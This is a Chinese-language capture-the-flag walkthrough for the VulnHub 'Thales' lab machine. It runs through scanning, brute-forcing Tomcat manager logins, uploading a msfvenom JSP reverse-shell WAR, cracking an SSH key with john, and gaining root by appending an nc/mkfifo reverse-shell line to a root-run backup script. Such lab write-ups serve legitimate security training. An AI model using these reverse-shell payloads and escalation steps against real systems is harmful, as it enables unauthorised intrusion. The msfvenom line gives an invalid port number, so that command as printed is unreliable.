vulnhub靶场之Thales

一.环境搭建

1.靶场描述

Description : Open your eyes and change your perspective
includes 2 flags:user.txt and root.txt.
Telegram: @machineboy141 (for any hint)
This works better with VIrtualBox rathe than VMware

2.靶场地址

https://www.vulnhub.com/entry/thales-1,749/
 
  

vulnhub靶场之Thales_第1张图片

3.启动靶场

Thales靶机在VMware运行会出现bug,所以我们在VirtualBox运行。

vulnhub靶场之Thales_第2张图片

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,因为我们在VirtualBox运行所以网段发生了变化,网段知道:192.168.1.0/24

二.渗透测试

1.目标

目标就是我们搭建的靶场,靶场IP为:192.168.1.0/24

2.信息收集

(1)寻找靶场真实ip

nmap -sP 192.168.1.0/24
 
  

vulnhub靶场之Thales_第3张图片

arp-scan -l
 
  

vulnhub靶场之Thales_第4张图片

靶场真实ip地址为192.168.1.13

(2)探测端口及服务

nmap -p- -sV 192.168.1.13
 
  

vulnhub靶场之Thales_第5张图片

发现开启了22端口,OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
发现开启了8080端口,Apache Tomcat 9.0.52
 
  

(3)web指纹识别

whatweb -v 192.168.1.13:8080
 
  

vulnhub靶场之Thales_第6张图片

3.渗透测试

(1)访问web服务

http://192.168.1.13:8080
 
  

vulnhub靶场之Thales_第7张图片

我们可以看到是Tomcat

(2)扫描web服务

1)棱洞3.0指纹识别
./EHole_linux_amd64 finger -u http://192.168.1.13:8080
 
  

vulnhub靶场之Thales_第8张图片

2)nikto扫描网站结构
nikto -h http://192.168.1.13:8080
 
  
3)dirsearch目录扫描
dirsearch -u 192.168.1.13:8080 -e * -x 403 --random-agent
 
  

我们扫描到一个登录页面

http://192.168.1.13:8080/manager
 
  

vulnhub靶场之Thales_第9张图片

目前,我们掌握的信息是一个tomcat框架和一个登录页面,因为tomcat 有管理登录页面,于是尝试爆破

(3)渗透测试

1)msf爆破
search login tomcat
 
  

vulnhub靶场之Thales_第10张图片

show options
 
  
set RHOSTS 192.168.1.13
 
  

vulnhub靶场之Thales_第11张图片

爆破出来一个用户名和密码

vulnhub靶场之Thales_第12张图片

tomcat:role1

2)登录

我们可以看到登录成功

vulnhub靶场之Thales_第13张图片

3)反弹shell

我们可以看到/shell和上传页面,那么我们进行shell,在 web 应用程序部署界面尝试在上传 war 包反弹 shell

vulnhub靶场之Thales_第14张图片

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.9 LPORT=666666 -f war -o MS02423.war
 
  

vulnhub靶场之Thales_第15张图片

我们进行上传

image-20240129172724391

上传成功后,在应用程序列表中看到已成功部署了 war 后门,点击访问后反弹

vulnhub靶场之Thales_第16张图片

我们可以看到反弹成功

我们进行提权,发现需要密码,我们进行查找

vulnhub靶场之Thales_第17张图片

4)执行脚本

一般情况下,我们首先去home目录下查看,然后在去/var/www/html/目录下查看有没有什么线索,我们看到了thales命令,我们进行查看

vulnhub靶场之Thales_第18张图片

我们看到了两个txt文件,模式里面提示我们,一个flag在user.txt,一个在root.txt里面,那么我们进行查看user.txt文件,但是需要thales权限,我们查看notes.txt文件,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh

includes 2 flags:user.txt and root.txt.
 
  

vulnhub靶场之Thales_第19张图片

image-20240130161920839

我们去执行这个脚本,但是执行之后却发现没有如何变化

vulnhub靶场之Thales_第20张图片

5)ssh 私钥文件

我们在thales目录下发现了隐藏的.ssh文件,我们进行查看

vulnhub靶场之Thales_第21张图片

这样看太难受了,我们进行交互模式进行查看

image-20240130162852020

我们可以看到公钥,我们进行查看

vulnhub靶场之Thales_第22张图片

我们把它保存下来,用john进行爆破

6)john爆破

将私钥文件保存到攻击机,利用 ssh2john 将私钥转化为 john 能处理的 SHA 加密的文件,然后进行爆破,得到密码为 vodka06

vulnhub靶场之Thales_第23张图片

vulnhub靶场之Thales_第24张图片

vulnhub靶场之Thales_第25张图片

7)查看user.txt文件

我们进行登录thales用户名

vulnhub靶场之Thales_第26张图片

我们获取到第一个flag,还有一个flag在root.txt里面,我们进行提权

8)提权

之前我们看到的那个脚本还没有查看内容,现在我们查看一下那个备份文件的代码

vulnhub靶场之Thales_第27张图片

是一个shell文件,并且是能运行命令的,我们是可以编辑的,并且是root用户运行的,我们插入一串反弹shell的命令

vulnhub靶场之Thales_第28张图片

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 5555 >/tmp/f" >> backup.sh
 
  

vulnhub靶场之Thales_第29张图片

等一会可以看到反弹成功,我们查看flag即可

vulnhub靶场之Thales_第30张图片

三.相关资源

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.dirsearch目录扫描

9.msf工具使用

10.ssh私钥文件

11.john爆破密码

12.反弹shell

你可能感兴趣的:([,vulnhub靶机通关篇,],web安全)